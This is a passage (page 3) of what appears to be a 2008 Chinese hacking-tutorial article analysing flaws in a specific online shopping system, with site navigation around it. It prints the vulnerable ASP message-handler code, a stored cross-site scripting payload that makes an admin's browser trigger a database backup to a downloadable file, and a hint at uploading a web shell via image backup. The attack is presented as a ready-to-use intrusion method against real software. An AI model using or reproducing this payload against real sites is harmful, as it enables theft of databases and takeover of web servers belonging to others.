通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 攻防教程 >> 文章正文
推荐:对网软网上购物系统的一点点分析
责任编辑:酷酷の鱼   更新日期:2008-1-18
 


到前台用123456登陆。成功!


跨站
问题发生在会员留言那里:mymsg_hand1.asp

sql="select * from sms"
set rs=server.createobject("adodb.recordset")
rs.open sql,conn,1,3
rs.addnew
rs("name")="admin"
neirong=request.form("neirong") ///入库的时候没有过滤
neirong=replace(neirong,"=======","<font color=darkgray>======")
rs("neirong")=neirong
rs("riqi")=now()
rs("fname")=request.cookies("cnhww")("username")
rs.update
rs.close
set rs=nothing

response.write "<script language='javascript'>"
response.write "alert('操作成功,已向管理员发送一条站内消息!');"
response.write "location.href='user.asp?action=famess';"
response.write "</script>"
response.end

conn.close
set conn=nothing
我们再看出库的时候有没有过滤呢?
Hand1.asp:
set rs=Server.CreateObject("ADODB.recordset")
sql="select * from sms where (name='管理员' or name='admin') and zuti='0' order by riqi desc"
rs.open sql,conn,1,3

if rs.eof and rs.bof then
response.write "<tr><td>收件箱中没有消息。</td></tr>"
else

......中间省略............

do while not rs.eof and pages>0
neirong=rs("neirong")
riqi=rs("riqi")
isnew=rs("isnew")
fname=rs("fname")
id=rs("id")
if pages<10 then response.write "<tr><td height=15></td></tr>"
%>

......中间省略............
<hr color=#e7e7e7><BR>
<%=replace(neirong,vbCRLF,"<BR>")%><br> 
</td></tr>
在输入的时候只把回车换成了<br>.我们只要在写跨站代码的时候别加回车就行了!
在留言那里写上:
<script>var op = window.open('backdata.asp');setTimeout("back()",2000);function back() {var form=op.document.forms[0];form.DBpath.value="../bbs/data/#wrtxcnshop.asp";form.bkDBname.value="test.mdb";form.submit();</script>
这样在管理员查看留言的时候就会自动打开数据库备份页进行数据库备份,备份后会在databackup目录下生成一个test.mdb

别的漏洞还有很多 有兴趣的朋友自己再看看代码吧...
拿SHELL的话冲进后台上传个图片备份吧。

上一页  [1] [2] [3] 

  • 上一篇文章:
  • 下一篇文章: 没有了
  • 最近更新
    固顶文章 爱国者安全网2007年度优秀版主评选
    普通文章 瑞星公司01月18日发布 每日计算机病毒及木马播报
    普通文章 07年病毒高速出新“工业化”入侵特征明显
    普通文章 病毒制造门槛低 互相模仿导致泛滥
    普通文章 我国IP地址数已达到1.35亿个 但缺口仍然很大
    普通文章 关于URL解析漏洞在PDF文档中的利用
    推荐文章 推荐:对网软网上购物系统的一点点分析
    普通文章 自己动手编写简单远程控制
    普通文章 IP-Tools中的密码学算法详细分析
    普通文章 **CHM 3.50 注册流程及算法分析(续)
    热门文章
    普通文章windows下利用OpenVPN搭建VPN服务器
    普通文章验证码 kaptcha 杂谈
    普通文章计算机病毒鼻祖里奇拟挑战谷歌
    普通文章利用漏洞传播 内嵌在网页中的木马病毒
    普通文章2007年病毒感染3000余万台电脑
    普通文章假低价信息吸引买主 盗号程序10秒内划走银行卡存款
    普通文章捷克黑客入侵电视节目遭指控
    普通文章美国男子用垃圾邮件操纵中国公司股价被起诉
    普通文章White_Dune 存在本地缓冲区溢出及格式串处理漏洞
    普通文章Trolltech Qt QSslSocket类证书验证绕过安全限制漏洞
    精彩专题